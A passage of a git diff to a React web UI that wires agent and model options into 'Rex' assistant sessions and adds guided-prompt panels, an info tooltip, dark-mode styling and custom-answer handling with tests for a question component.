+        setDrawerWidth(Math.min(resolvedMaxWidth, Math.max(minWidth, dragStartWidth.current + delta)));
       };
 
       const handleMouseUp = () => {
@@ -248,7 +414,7 @@ export default function EntitySheet({
       window.addEventListener('mousemove', handleMouseMove);
       window.addEventListener('mouseup', handleMouseUp);
     },
-    [minWidth, maxWidth],
+    [minWidth, resolvedMaxWidth],
   );
 
   // ── openRex (exposed via context) ─────────────────────────────────────────
@@ -256,15 +422,18 @@ export default function EntitySheet({
   const openRex = useCallback(
     (msg?: string) => {
       setActiveTab('rex');
-      if (sessionId && msg) {
-        client.post(`/api/session/${sessionId}/prompt_async`, {
+      if (activeRexSessionId && msg) {
+        const payload: Record<string, unknown> = {
           parts: [{ type: 'text', text: msg }],
-        });
+        };
+        if (rexAgentName) payload.agent = rexAgentName;
+        if (rexModel) payload.model = rexModel;
+        client.post(`/api/session/${activeRexSessionId}/prompt_async`, payload);
       } else if (msg) {
-        createAndSendRex({ text: msg }).catch(() => {});
+        createAndSendRex({ text: msg, agent: rexAgentName, model: rexModel }).catch(() => {});
       }
     },
-    [sessionId, createAndSendRex],
+    [activeRexSessionId, createAndSendRex, rexAgentName, rexModel],
   );
 
   // ── openTest (exposed via context) ────────────────────────────────────────
@@ -296,19 +465,33 @@ export default function EntitySheet({
 
   // ── Extract from Rex ──────────────────────────────────────────────────────
 
-  const handleExtract = async () => {
-    if (!sessionId || !onExtractFromRex) return;
+  const handleExtract = useCallback(async () => {
+    if (!activeRexSessionId || !onExtractFromRex) return;
     setExtracting(true);
     setExtractError(null);
     try {
-      await onExtractFromRex(sessionId);
+      await onExtractFromRex(activeRexSessionId);
       setActiveTab('form');
     } catch (err: unknown) {
       setExtractError(err instanceof Error ? err.message : t('entity.extractFailed'));
     } finally {
       setExtracting(false);
     }
-  };
+  }, [activeRexSessionId, onExtractFromRex, t]);
+
+  const startRexGuidePrompt = useCallback((prompt: string, label: string) => {
+    if (prompt === EXTRACT_FROM_REX_GUIDE_PROMPT) {
+      void handleExtract();
+      return;
+    }
+
+    createAndSendRex({
+      text: prompt,
+      agent: rexAgentName,
+      model: rexModel,
+      displayText: buildInstructionDisplayText(label),
+    }).catch(() => {});
+  }, [createAndSendRex, handleExtract, rexAgentName, rexModel]);
 
   if (!open) return null;
 
@@ -350,7 +533,7 @@ export default function EntitySheet({
 
           {/* Tabs */}
           {showTabs && (
-            <div className="flex px-6">
+            <div className="flex w-full px-6">
               {hasFormTab && (
                 <SheetTab
                   active={activeTab === 'form'}
@@ -484,23 +667,75 @@ export default function EntitySheet({
                   </button>
                 </div>
               )}
-              {!sessionError && (
+              {!sessionError && !rexSessionHydrated && (
+                <div className="flex items-center justify-center flex-1 text-sm text-gray-400 gap-2">
+                  <Loader2 className="w-4 h-4 animate-spin" />
+                  {t('entity.startingRex')}
+                </div>
+              )}
+              {!sessionError && rexSessionHydrated && (
                 <SessionChat
-                  sessionId={sessionId}
-                  live={!!sessionId}
+                  sessionId={activeRexSessionId}
+                  live={!!activeRexSessionId}
                   placeholder={t('entity.rexInputPlaceholder')}
-                  className="flex-1"
+                  className="h-full"
                   emptyText={t('entity.rexReady')}
+                  display={REX_WORKBENCH_DISPLAY}
                   initialMessage={rexInitialMessage}
-                  supportsVision={supportsVision}
-                  onCreateAndSend={!sessionId ? (text, imageParts) => createAndSendRex({ text, imageParts }) : undefined}
-                  welcomeContent={!sessionId ? (
-                    <div className="text-center max-w-md">
-                      <MessageSquare className="w-10 h-10 text-red-500 mx-auto mb-3" />
-                      <h3 className="text-lg font-semibold text-gray-900 mb-2">{t('entity.rexAssist')}</h3>
-                      <p className="text-sm text-gray-500">{t('entity.rexReady')}</p>
-                    </div>
-                  ) : undefined}
+                  agentName={rexAgentName}
+                  mentionAgents={rexMentionAgents}
+                  model={rexModel}
+                  supportsVision={rexSupportsVision ?? supportsVision}
+                  contextWindowTokens={rexContextWindowTokens}
+                  toolbarSlot={rexToolbarSlot}
+                  centerToolbarSlot={rexCenterToolbarSlot}
+                  composerTextareaMinHeight={rexComposerTextareaMinHeight}
+                  composerTextareaMaxHeight={rexComposerTextareaMaxHeight}
+                  onCreateAndSend={!activeRexSessionId ? (text, imageParts, agentOverride, modelOverride, options) => createAndSendRex({
+                    text,
+                    imageParts,
+                    agent: agentOverride || rexAgentName,
+                    model: modelOverride === undefined ? rexModel : modelOverride,
+                    displayText: options?.displayText,
+                  }) : undefined}
+                  welcomeContent={(
+                    hasRexGuideActions ? (
+                      <GuidedCreatePanel
+                        emptyTitle={rexGuideEmptyTitle ?? t('entity.rexReady')}
+                        icon={rexGuideIcon ?? <MessageSquare className="h-5 w-5" />}
+                        title={rexGuidePanelTitle ?? t('entity.rexAssist')}
+                        description={rexGuidePanelDesc ?? t('entity.rexReady')}
+                        groups={rexWelcomeGuideGroups}
+                        onStartPrompt={startRexGuidePrompt}
+                      />
+                    ) : (
+                      <div className="text-center max-w-md">
+                        <MessageSquare className="w-10 h-10 text-red-500 mx-auto mb-3" />
+                        <h3 className="text-lg font-semibold text-gray-900 mb-2">{t('entity.rexAssist')}</h3>
+                        <p className="text-sm text-gray-500">{t('entity.rexReady')}</p>
+                      </div>
+                    )
+                  )}
+                  conversationBottomSlot={({ sendPrompt, sending, streaming, hasMessages }) => (
+                    hasRexGuideActions && hasMessages ? (
+                      <ChatGuideDock
+                        actions={rexGuideActions}
+                        disabled={sending || streaming || extracting}
+                        collapseTitle={rexGuideCollapseTitle ?? t('entity.guideCollapse')}
+                        expandTitle={rexGuideExpandTitle ?? t('entity.guideExpand')}
+                        onStartPrompt={(prompt, label) => {
+                          if (prompt === EXTRACT_FROM_REX_GUIDE_PROMPT) {
+                            void handleExtract();
+                            return;
+                          }
+
+                          sendPrompt(prompt, {
+                            displayText: buildInstructionDisplayText(label),
+                          });
+                        }}
+                      />
+                    ) : null
+                  )}
                 />
               )}
             </div>
@@ -538,7 +773,7 @@ export default function EntitySheet({
         )}
 
         {/* ── Rex tab footer: extract / switch actions only ── */}
-        {activeTab === 'rex' && (
+        {showRexFooter && (
           <div className="flex-shrink-0 border-t border-gray-200 bg-white px-6 py-3">
             {extractError && (
               <p className="text-xs text-red-500 mb-2 flex items-center gap-1">
@@ -548,21 +783,7 @@ export default function EntitySheet({
             )}
             <div className="flex items-center justify-between">
               <div>
-                {onExtractFromRex && sessionId ? (
-                  <button
-                    onClick={handleExtract}
-                    disabled={extracting}
-                    className="flex items-center gap-1.5 text-sm text-red-600 hover:text-red-700 disabled:opacity-50 disabled:cursor-not-allowed transition-colors"
-                  >
-                    {extracting ? (
-                      <Loader2 className="w-4 h-4 animate-spin" />
-                    ) : (
-                      <Wand2 className="w-4 h-4" />
-                    )}
-                    {extracting ? t('entity.extracting') : t('entity.extractFromRex')}
-                    {!extracting && <ArrowRight className="w-3.5 h-3.5" />}
-                  </button>
-                ) : sessionId && hasFormTab ? (
+                {!onExtractFromRex && activeRexSessionId && hasFormTab ? (
                   <button
                     onClick={() => setActiveTab('form')}
                     className="flex items-center gap-1.5 text-sm text-gray-500 hover:text-gray-700 transition-colors"
@@ -573,9 +794,7 @@ export default function EntitySheet({
                 ) : null}
               </div>
 
-              {/* In create mode, show Done button directly in the Rex tab so the user
-                  doesn't have to switch to the form tab after the agent is created. */}
-              {mode === 'create' && (
+              {mode === 'create' && !hasRexGuideActions && (
                 <SubmitButtons
                   onClose={onClose}
                   onSubmit={onSubmit}
@@ -647,14 +866,14 @@ function SheetTab({
   return (
     <button
       onClick={onClick}
-      className={`flex items-center gap-1.5 px-4 py-2.5 text-sm font-medium border-b-2 transition-colors ${
+      className={`flex min-w-0 flex-1 items-center justify-center gap-1.5 px-3 py-2.5 text-sm font-medium border-b-2 transition-colors ${
         active
           ? 'border-red-600 text-red-600'
           : 'border-transparent text-gray-500 hover:text-gray-700 hover:border-gray-300'
       }`}
     >
-      {icon}
-      {children}
+      <span className="shrink-0">{icon}</span>
+      <span className="truncate">{children}</span>
     </button>
   );
 }
diff --git a/webui/src/components/common/GuideInfoIcon.tsx b/webui/src/components/common/GuideInfoIcon.tsx
new file mode 100644
index 000000000..5393af78d
--- /dev/null
+++ b/webui/src/components/common/GuideInfoIcon.tsx
@@ -0,0 +1,80 @@
+import { useCallback, useId, useState } from 'react';
+import { createPortal } from 'react-dom';
+import { Info } from 'lucide-react';
+
+interface GuideTooltip {
+  title: string;
+  description: string;
+  x: number;
+  y: number;
+}
+
+interface GuideInfoIconProps {
+  label: string;
+  description: string;
+  className?: string;
+}
+
+export default function GuideInfoIcon({
+  label,
+  description,
+  className = '',
+}: GuideInfoIconProps) {
+  const [tooltip, setTooltip] = useState<GuideTooltip | null>(null);
+  const tooltipId = useId();
+  const canPortal = typeof document !== 'undefined';
+
+  const showTooltip = useCallback((target: HTMLElement) => {
+    const rect = target.getBoundingClientRect();
+    setTooltip({
+      title: label,
+      description,
+      x: rect.left + rect.width / 2,
+      y: rect.top - 8,
+    });
+  }, [description, label]);
+
+  const hideTooltip = useCallback(() => setTooltip(null), []);
+
+  return (
+    <>
+      <span
+        tabIndex={0}
+        className={`inline-flex h-5 w-5 flex-shrink-0 items-center justify-center rounded-md text-zinc-300 transition-colors hover:bg-white/80 hover:text-rose-500 ${className}`}
+        aria-label={`${label}说明`}
+        aria-describedby={tooltip ? tooltipId : undefined}
+        role="img"
+        onMouseDown={(event) => {
+          event.preventDefault();
+          event.stopPropagation();
+        }}
+        onClick={(event) => {
+          event.preventDefault();
+          event.stopPropagation();
+        }}
+        onPointerEnter={(event) => showTooltip(event.currentTarget)}
+        onFocus={(event) => showTooltip(event.currentTarget)}
+        onMouseEnter={(event) => showTooltip(event.currentTarget)}
+        onMouseOver={(event) => showTooltip(event.currentTarget)}
+        onPointerLeave={hideTooltip}
+        onBlur={hideTooltip}
+        onMouseLeave={hideTooltip}
+      >
+        <Info className="h-3.5 w-3.5" aria-hidden="true" />
+      </span>
+      {tooltip && canPortal && createPortal(
+        <div
+          id={tooltipId}
+          role="tooltip"
+          className="pointer-events-none fixed z-[1000] w-52 -translate-x-1/2 -translate-y-full rounded-lg border border-zinc-200 bg-white px-3 py-2 text-[11px] leading-relaxed text-zinc-600 shadow-md"
+          style={{ left: tooltip.x, top: tooltip.y }}
+        >
+          <div className="mb-0.5 font-semibold text-zinc-800">{tooltip.title}</div>
+          <div>{tooltip.description}</div>
+          <div className="absolute left-1/2 top-full -translate-x-1/2 border-4 border-transparent border-t-zinc-200" />
+        </div>,
+        document.body,
+      )}
+    </>
+  );
+}
diff --git a/webui/src/components/common/GuidedCreatePanel.test.tsx b/webui/src/components/common/GuidedCreatePanel.test.tsx
new file mode 100644
index 000000000..22c1a9715
--- /dev/null
+++ b/webui/src/components/common/GuidedCreatePanel.test.tsx
@@ -0,0 +1,34 @@
+import { render, screen } from '@testing-library/react';
+import { describe, expect, it, vi } from 'vitest';
+
+import GuidedCreatePanel from './GuidedCreatePanel';
+
+describe('GuidedCreatePanel', () => {
+  it('renders guide actions as workflow-style full-width rows', () => {
+    render(
+      <GuidedCreatePanel
+        title="Rex 辅助修改"
+        description="选择一个入口开始编辑"
+        groups={[{
+          title: '编辑引导',
+          actions: [
+            { label: '从 Rex 提取配置', description: '提取配置', prompt: 'extract' },
+            { label: '检查模型策略', description: '检查模型', prompt: 'model' },
+            { label: '调整温度', description: '调整温度', prompt: 'temperature' },
+            { label: '验证效果', description: '验证效果', prompt: 'verify' },
+          ],
+        }]}
+        onStartPrompt={vi.fn()}
+      />,
+    );
+
+    const section = screen.getByTestId('guided-create-section-编辑引导');
+
+    expect(section).toHaveClass('flex');
+    expect(section).toHaveClass('flex-col');
+    expect(section).not.toHaveClass('sm:grid-cols-2');
+    expect(screen.getByRole('button', { name: '从 Rex 提取配置' }).parentElement).toHaveClass('w-full');
+    expect(screen.getByRole('button', { name: '从 Rex 提取配置' })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: '验证效果' })).toBeInTheDocument();
+  });
+});
diff --git a/webui/src/components/common/GuidedCreatePanel.tsx b/webui/src/components/common/GuidedCreatePanel.tsx
new file mode 100644
index 000000000..e15269556
--- /dev/null
+++ b/webui/src/components/common/GuidedCreatePanel.tsx
@@ -0,0 +1,142 @@
+import type { ReactNode } from 'react';
+import { MessageSquare } from 'lucide-react';
+import type { ChatGuideAction } from './ChatGuideDock';
+import GuideInfoIcon from './GuideInfoIcon';
+
+export interface GuidedCreateGroup {
+  title: string;
+  actions: ChatGuideAction[];
+}
+
+export function normalizeGuidedCreateActions(value: unknown, group?: string): ChatGuideAction[] {
+  if (!Array.isArray(value)) return [];
+  return value
+    .map((item) => {
+      if (!item || typeof item !== 'object') return null;
+      const raw = item as Record<string, unknown>;
+      const label = String(raw.label ?? '').trim();
+      const description = String(raw.description ?? '').trim();
+      const prompt = String(raw.prompt ?? '').trim();
+      const rawGroup = String(raw.group ?? '').trim();
+      if (!label || !prompt) return null;
+      return {
+        label,
+        description: description || prompt,
+        prompt,
+        ...((rawGroup || group) ? { group: rawGroup || group } : {}),
+      };
+    })
+    .filter((item): item is ChatGuideAction => item !== null);
+}
+
+export function buildGuidedCreateGroups(groups: Array<{ title: string; actions: unknown }>): GuidedCreateGroup[] {
+  return groups
+    .map((group) => ({
+      title: group.title,
+      actions: normalizeGuidedCreateActions(group.actions, group.title),
+    }))
+    .filter((group) => group.actions.length > 0);
+}
+
+interface GuidedCreatePanelProps {
+  emptyTitle?: string;
+  icon?: ReactNode;
+  title: string;
+  description: string;
+  groups: GuidedCreateGroup[];
+  scrollTestId?: string;
+  onStartPrompt: (prompt: string, label: string) => void;
+}
+
+export default function GuidedCreatePanel({
+  emptyTitle,
+  icon,
+  title,
+  description,
+  groups,
+  scrollTestId,
+  onStartPrompt,
+}: GuidedCreatePanelProps) {
+  const visibleGroups = groups
+    .map((group) => ({
+      ...group,
+      actions: group.actions.filter((action) => action.label && action.prompt),
+    }))
+    .filter((group) => group.actions.length > 0);
+
+  return (
+    <div className="flex min-h-[420px] w-full flex-col items-center justify-center px-5 py-8">
+      {emptyTitle && (
+        <p className="mb-8 text-center text-sm font-medium text-gray-400">
+          {emptyTitle}
+        </p>
+      )}
+      <div className="flex max-h-[min(560px,calc(100vh-260px))] w-full max-w-[420px] flex-col overflow-hidden rounded-xl border border-gray-200 bg-white px-5 py-5 text-center shadow-sm">
+        <div className="flex-shrink-0">
+          <div className="mx-auto flex h-11 w-11 items-center justify-center rounded-xl border border-red-100 bg-red-50 text-red-500">
+            {icon ?? <MessageSquare className="h-5 w-5" />}
+          </div>
+          <h3 className="mt-4 text-sm font-semibold text-gray-900">
+            {title}
+          </h3>
+          <p className="mx-auto mt-2 max-w-[300px] text-xs leading-relaxed text-gray-500">
+            {description}
+          </p>
+        </div>
+        <div
+          data-testid={scrollTestId}
+          className="mt-4 min-h-0 space-y-4 overflow-y-auto pr-1 text-left [scrollbar-width:thin] [scrollbar-color:#e4e4e7_transparent]"
+        >
+          {visibleGroups.map((group) => (
+            <GuidedCreateSection
+              key={group.title}
+              title={group.title}
+              actions={group.actions}
+              onStartPrompt={onStartPrompt}
+            />
+          ))}
+        </div>
+      </div>
+    </div>
+  );
+}
+
+function GuidedCreateSection({
+  title,
+  actions,
+  onStartPrompt,
+}: {
+  title: string;
+  actions: ChatGuideAction[];
+  onStartPrompt: (prompt: string, label: string) => void;
+}) {
+  return (
+    <section>
+      <h4 className="mb-2 text-[11px] font-semibold text-gray-400">{title}</h4>
+      <div
+        data-testid={`guided-create-section-${title}`}
+        className="flex flex-col gap-1.5"
+      >
+        {actions.map((action) => (
+          <div
+            key={action.label}
+            className="group flex h-8 w-full items-center justify-between gap-3 rounded-lg border border-gray-200 bg-white px-3 text-left text-xs font-semibold text-gray-700 transition-colors hover:border-rose-200 hover:bg-rose-50/70 hover:text-rose-600"
+          >
+            <button
+              type="button"
+              onClick={() => onStartPrompt(action.prompt, action.label)}
+              className="min-w-0 flex-1 truncate text-left"
+            >
+              {action.label}
+            </button>
+            <GuideInfoIcon
+              label={action.label}
+              description={action.description}
+              className="group-hover:text-rose-400"
+            />
+          </div>
+        ))}
+      </div>
+    </section>
+  );
+}
diff --git a/webui/src/components/common/LanguageSwitcher.tsx b/webui/src/components/common/LanguageSwitcher.tsx
index fd606e34a..3f473819e 100644
--- a/webui/src/components/common/LanguageSwitcher.tsx
+++ b/webui/src/components/common/LanguageSwitcher.tsx
@@ -27,7 +27,7 @@ export default function LanguageSwitcher({ collapsed = false }: LanguageSwitcher
     return (
       <button
         onClick={toggleLanguage}
-        className="flex items-center justify-center w-8 h-8 rounded-lg text-zinc-400 hover:text-zinc-600 hover:bg-white/60 transition-colors"
+        className="flex items-center justify-center w-8 h-8 rounded-lg text-zinc-400 hover:text-zinc-600 hover:bg-white/60 transition-colors dark:text-zinc-400 dark:hover:bg-zinc-800 dark:hover:text-zinc-100"
         title={t('switchLanguage')}
       >
         <Globe className="w-4 h-4" />
@@ -43,8 +43,8 @@ export default function LanguageSwitcher({ collapsed = false }: LanguageSwitcher
           onClick={() => handleChange(code)}
           className={`px-2.5 py-1 text-xs font-medium rounded-md transition-colors ${
             currentLang === code
-              ? 'bg-white text-zinc-900 shadow-sm'
-              : 'text-zinc-500 hover:bg-white/60 hover:text-zinc-800'
+              ? 'bg-white text-zinc-900 shadow-sm dark:bg-zinc-800 dark:text-zinc-50'
+              : 'text-zinc-500 hover:bg-white/60 hover:text-zinc-800 dark:text-zinc-400 dark:hover:bg-zinc-800 dark:hover:text-zinc-100'
           }`}
         >
           {label}
diff --git a/webui/src/components/common/QuestionTool.test.tsx b/webui/src/components/common/QuestionTool.test.tsx
new file mode 100644
index 000000000..7ebf6b399
--- /dev/null
+++ b/webui/src/components/common/QuestionTool.test.tsx
@@ -0,0 +1,215 @@
+import { render, screen } from '@testing-library/react';
+import userEvent from '@testing-library/user-event';
+import { beforeEach, describe, expect, it, vi } from 'vitest';
+
+import { QuestionTool } from './QuestionTool';
+
+vi.mock('react-i18next', () => ({
+  useTranslation: () => ({
+    t: (key: string, params?: Record<string, unknown>) => {
+      const translations: Record<string, string> = {
+        'question.multiSelect': '可多选',
+        'question.singleSelect': '单选',
+        'question.selectedCount': `已选 ${params?.count ?? 0} 项`,
+        'question.textPlaceholder': '请输入...',
+        'question.needsAnswer': '需要你的回答',
+        'question.customAnswer': '自定义 / 补充说明',
+        'question.confirm': '确认',
+        'question.skip': '跳过',
+      };
+      return translations[key] ?? key;
+    },
+  }),
+}));
+
+describe('QuestionTool', () => {
+  beforeEach(() => {
+    vi.clearAllMocks();
+  });
+
+  it('requires standalone text answers before submitting', async () => {
+    const user = userEvent.setup();
+    const onAnswer = vi.fn().mockResolvedValue(undefined);
+
+    render(
+      <QuestionTool
+        questions={[{
+          header: '自定义',
+          question: '如果没有补充说明，请留空。',
+          type: 'text',
+        }]}
+        onAnswer={onAnswer}
+      />,
+    );
+
+    expect(screen.getByRole('button', { name: /确认/ })).toBeDisabled();
+    await user.click(screen.getByRole('button', { name: /确认/ }));
+
+    expect(onAnswer).not.toHaveBeenCalled();
+  });
+
+  it('renders a custom text follow-up inside the preceding choice question', async () => {
+    const user = userEvent.setup();
+    const onAnswer = vi.fn().mockResolvedValue(undefined);
+
+    render(
+      <QuestionTool
+        questions={[
+          {
+            header: '输入模式',
+            question: '告警将以哪种方式进入 stream_alert_denoise?',
+            type: 'choice',
+            options: [
+              {
+                label: 'Syslog 实时流',
+                description: '安全设备按 syslog 转发到本机。',
+              },
+              'API 批次调用',
+            ],
+          },
+          {
+            header: 'Step 1 自定义',
+            question: '如需自定义/补充说明，请输入；没有则填 none。',
+            type: 'text',
+          },
+        ]}
+        onAnswer={onAnswer}
+        compact
+      />,
+    );
+
+    expect(screen.queryByText('Step 1 自定义')).not.toBeInTheDocument();
+    expect(screen.getByText('自定义')).toBeInTheDocument();
+    expect(screen.getByRole('textbox')).toHaveAttribute('placeholder', 'none');
+
+    await user.click(screen.getByRole('button', { name: /Syslog 实时流/ }));
+    await user.click(screen.getByRole('button', { name: /确认/ }));
+
+    expect(onAnswer).toHaveBeenCalledWith([['Syslog 实时流'], ['none']]);
+  });
+
+  it('renders choice options that use common non-label fields', async () => {
+    const user = userEvent.setup();
+    const onAnswer = vi.fn().mockResolvedValue(undefined);
+
+    render(
+      <QuestionTool
+        questions={[{
+          header: '数据源',
+          question: '漏洞数据源用什么?',
+          type: 'choice',
+          custom: false,
+          options: [
+            { value: 'NVD', desc: 'Public CVE feed' },
+            { text: '内部扫描器' },
+            { label: '' },
+          ],
+        }]}
+        onAnswer={onAnswer}
+      />,
+    );
+
+    expect(screen.getByRole('button', { name: /NVD/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /内部扫描器/ })).toBeInTheDocument();
+    expect(screen.queryAllByRole('button')).toHaveLength(3);
+
+    await user.click(screen.getByRole('button', { name: /NVD/ }));
+    await user.click(screen.getByRole('button', { name: /确认/ }));
+
+    expect(onAnswer).toHaveBeenCalledWith([['NVD']]);
+  });
+
+  it('uses typed text as the answer when a provided Other option is selected', async () => {
+    const user = userEvent.setup();
+    const onAnswer = vi.fn().mockResolvedValue(undefined);
+
+    render(
+      <QuestionTool
+        questions={[{
+          header: '测试范围',
+          question: '「做一个测试」具体指什么?',
+          type: 'choice',
+          options: [
+            '代码单元测试',
+            {
+              label: '其他(请补充)',
+              description: '描述具体测试内容和目标',
+            },
+          ],
+        }]}
+        onAnswer={onAnswer}
+      />,
+    );
+
+    await user.click(screen.getByRole('button', { name: /其他/ }));
+
+    expect(screen.getByRole('textbox')).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /确认/ })).toBeDisabled();
+
+    await user.type(screen.getByRole('textbox'), '验证登录失败提示');
+    await user.click(screen.getByRole('button', { name: /确认/ }));
+
+    expect(onAnswer).toHaveBeenCalledWith([['验证登录失败提示']]);
+  });
+
+  it('auto-appends an Other option by default and submits typed text', async () => {
+    const user = userEvent.setup();
+    const onAnswer = vi.fn().mockResolvedValue(undefined);
+
+    render(
+      <QuestionTool
+        questions={[{
+          question: '选择测试范围',
+          type: 'choice',
+          options: ['代码单元测试', '环境/连通性测试'],
+        }]}
+        onAnswer={onAnswer}
+      />,
+    );
+
+    await user.click(screen.getByRole('button', { name: /自定义 \/ 补充说明/ }));
+    await user.type(screen.getByRole('textbox'), '测试登录接口的 401 返回');
+    await user.click(screen.getByRole('button', { name: /确认/ }));
+
+    expect(onAnswer).toHaveBeenCalledWith([['测试登录接口的 401 返回']]);
+  });
+
+  it('does not auto-append Other when custom is disabled', () => {
+    const onAnswer = vi.fn().mockResolvedValue(undefined);
+
+    render(
+      <QuestionTool
+        questions={[{
+          question: '选择测试范围',
+          type: 'choice',
+          custom: false,
+          options: ['代码单元测试', '环境/连通性测试'],
+        }]}
+        onAnswer={onAnswer}
+      />,
+    );
+
+    expect(screen.queryByRole('button', { name: /自定义 \/ 补充说明/ })).not.toBeInTheDocument();
+  });
+
+  it('falls back to text input when a choice question has no visible options', async () => {
+    const user = userEvent.setup();
+    const onAnswer = vi.fn().mockResolvedValue(undefined);
+
+    render(
+      <QuestionTool
+        questions={[{
+          question: '漏洞数据源用什么?',
+          type: 'choice',
+          options: [{ label: '' }],
+        }]}
+        onAnswer={onAnswer}
+      />,
+    );
+
+    await user.type(screen.getByRole('textbox'), 'NVD');
+    await user.click(screen.getByRole('button', { name: /确认/ }));
+
+    expect(onAnswer).toHaveBeenCalledWith([['NVD']]);
+  });
+});
diff --git a/webui/src/components/common/QuestionTool.tsx b/webui/src/components/common/QuestionTool.tsx
index 9caec681d..0d7d5f19b 100644
--- a/webui/src/components/common/QuestionTool.tsx
+++ b/webui/src/components/common/QuestionTool.tsx
@@ -21,8 +21,9 @@ import { useTranslation } from 'react-i18next';
 export type QuestionType = 'choice' | 'text' | 'number' | 'file' | 'confirm' | 'password';
 
 export interface QuestionOption {
-  label: string;
+  label?: string;
   description?: string;
+  [key: string]: unknown;
 }
 
 export interface QuestionItem {
@@ -34,6 +35,8 @@ export interface QuestionItem {
   options?: (QuestionOption | string)[];
   /** For choice: allow selecting multiple options */
   multiple?: boolean;
+  /** For choice: allow a custom "Other" free-form answer. Defaults to true. */
+  custom?: boolean;
   /** Placeholder/hint text */
   placeholder?: string;
   /** For text: use textarea (multi-line) */
@@ -61,29 +64,106 @@ export interface QuestionToolProps {
 // ============================================================================
 
 function resolveType(q: QuestionItem): QuestionType {
+  const hasOptions = (q.options ?? []).some(opt => optionLabel(opt));
+  if (q.type === 'choice' && !hasOptions) return 'text';
   if (q.type) return q.type;
-  if (q.options && q.options.length > 0) return 'choice';
+  if (hasOptions) return 'choice';
   return 'text';
 }
 
 function optionLabel(opt: QuestionOption | string): string {
-  return typeof opt === 'string' ? opt : opt.label;
+  if (typeof opt === 'string') return opt;
+  for (const key of ['label', 'text', 'title', 'name', 'value', 'id', 'key']) {
+    const value = opt[key];
+    if (value !== undefined && value !== null) {
+      const text = String(value).trim();
+      if (text) return text;
+    }
+  }
+  return '';
 }
 
 function optionDescription(opt: QuestionOption | string): string {
-  return typeof opt === 'string' ? '' : (opt.description ?? '');
+  if (typeof opt === 'string') return '';
+  for (const key of ['description', 'desc', 'subtitle', 'detail', 'details']) {
+    const value = opt[key];
+    if (value !== undefined && value !== null) {
+      const text = String(value).trim();
+      if (text) return text;
+    }
+  }
+  return '';
+}
+
+const CUSTOM_CHOICE_PREFIX = '__flocks_custom_choice__:';
+
+function isCustomChoiceLabel(label: string): boolean {
+  return /^(其他|其它|自定义|补充)|\b(other|custom)\b|请补充|补充说明|type your answer/i.test(label.trim());
+}
+
+function customChoiceValue(text: string): string {
+  return `${CUSTOM_CHOICE_PREFIX}${text}`;
+}
+
+function isCustomChoiceValue(value: string): boolean {
+  return value.startsWith(CUSTOM_CHOICE_PREFIX);
+}
+
+function customChoiceText(answer: string[]): string {
+  const value = answer.find(isCustomChoiceValue) ?? '';
+  return value.slice(CUSTOM_CHOICE_PREFIX.length);
 }
 
-function isQuestionAnswered(q: QuestionItem, answer: string[]): boolean {
+function hasCustomChoice(answer: string[]): boolean {
+  return answer.some(isCustomChoiceValue);
+}
+
+function shouldOfferCustomChoice(q: QuestionItem): boolean {
+  return resolveType(q) === 'choice' && q.custom !== false;
+}
+
+function isQuestionAnswered(q: QuestionItem, answer: string[], allowBlankAsNone = false): boolean {
   const type = resolveType(q);
-  if (type === 'choice') return answer.length > 0;
+  if (type === 'choice') {
+    if (hasCustomChoice(answer)) return customChoiceText(answer).trim().length > 0;
+    return answer.length > 0;
+  }
   if (type === 'confirm') return answer.length > 0;
-  if (type === 'text' || type === 'password') return (answer[0] ?? '').trim().length > 0;
-  if (type === 'number') return (answer[0] ?? '').trim().length > 0;
+  if (type === 'text' || type === 'password' || type === 'number') {
+    return allowBlankAsNone || (answer[0] ?? '').trim().length > 0;
+  }
   if (type === 'file') return answer.length > 0;
   return false;
 }
 
+function normalizeAnswerForSubmit(q: QuestionItem, answer: string[], allowBlankAsNone = false): string[] {
+  const type = resolveType(q);
+  if (type === 'choice') {
+    return answer.flatMap(value => {
+      if (!isCustomChoiceValue(value)) return [value];
+      const text = value.slice(CUSTOM_CHOICE_PREFIX.length).trim();
+      return text ? [text] : [];
+    });
+  }
+  if (allowBlankAsNone && type === 'text') {
+    const value = (answer[0] ?? '').trim();
+    return [value || 'none'];
+  }
+  return answer;
+}
+
+function isInlineTextFollowUp(prev: QuestionItem | undefined, q: QuestionItem | undefined): boolean {
+  if (!q) return false;
+  if (!prev || resolveType(prev) !== 'choice' || resolveType(q) !== 'text') return false;
+  const marker = `${q.header ?? ''} ${q.question ?? ''} ${q.placeholder ?? ''}`.toLowerCase();
+  return /自定义|补充|说明|备注|其他|其它|custom|other|additional|note|comment/.test(marker);
+}
+
+function inlineTextHeader(q: QuestionItem, fallback: string): string {
+  const header = (q.header ?? '').replace(/^step\s*\d+\s*/i, '').trim();
+  return header || fallback;
+}
+
 // ============================================================================
 // Sub-components
 // ============================================================================
@@ -103,6 +183,29 @@ function ChoiceInput({
 }) {
   const { t } = useTranslation('common');
   const multiple = q.multiple ?? false;
+  const visibleOptions = (q.options ?? [])
+    .map(opt => ({
+      label: optionLabel(opt),
+      description: optionDescription(opt),
+      custom: false,
+    }))
+    .filter(opt => opt.label);
+  const hasProvidedCustomOption = visibleOptions.some(opt => isCustomChoiceLabel(opt.label));
+  const options = shouldOfferCustomChoice(q) && !hasProvidedCustomOption
+    ? [
+        ...visibleOptions,
+        {
+          label: t('question.customAnswer'),
+          description: t('question.textPlaceholder'),
+          custom: true,
+        },
+      ]
+    : visibleOptions.map(opt => ({
+        ...opt,
+        custom: isCustomChoiceLabel(opt.label),
+      }));
+  const customSelected = hasCustomChoice(answer);
+  const customText = customChoiceText(answer);
   const toggle = (label: string) => {
     if (multiple) {
       onChange(answer.includes(label) ? answer.filter(l => l !== label) : [...answer, label]);
@@ -110,6 +213,26 @@ function ChoiceInput({
       onChange([label]);
     }
   };
+  const toggleCustom = () => {
+    if (multiple) {
+      if (customSelected) {
+        onChange(answer.filter(value => !isCustomChoiceValue(value)));
+      } else {
+        onChange([...answer, customChoiceValue(customText)]);
+      }
+      return;
+    }
+    onChange(customSelected ? [] : [customChoiceValue(customText)]);
+  };
+  const setCustomText = (text: string) => {
+    const nextCustom = customChoiceValue(text);
+    if (multiple) {
+      const withoutCustom = answer.filter(value => !isCustomChoiceValue(value));
+      onChange([...withoutCustom, nextCustom]);
+      return;
+    }
+    onChange([nextCustom]);
+  };
 
   return (
     <div>
@@ -118,47 +241,59 @@ function ChoiceInput({
         {multiple ? `☑ ${t('question.multiSelect')}` : `○ ${t('question.singleSelect')}`}
       </div>
       <div className="space-y-1.5">
-        {(q.options ?? []).map(opt => {
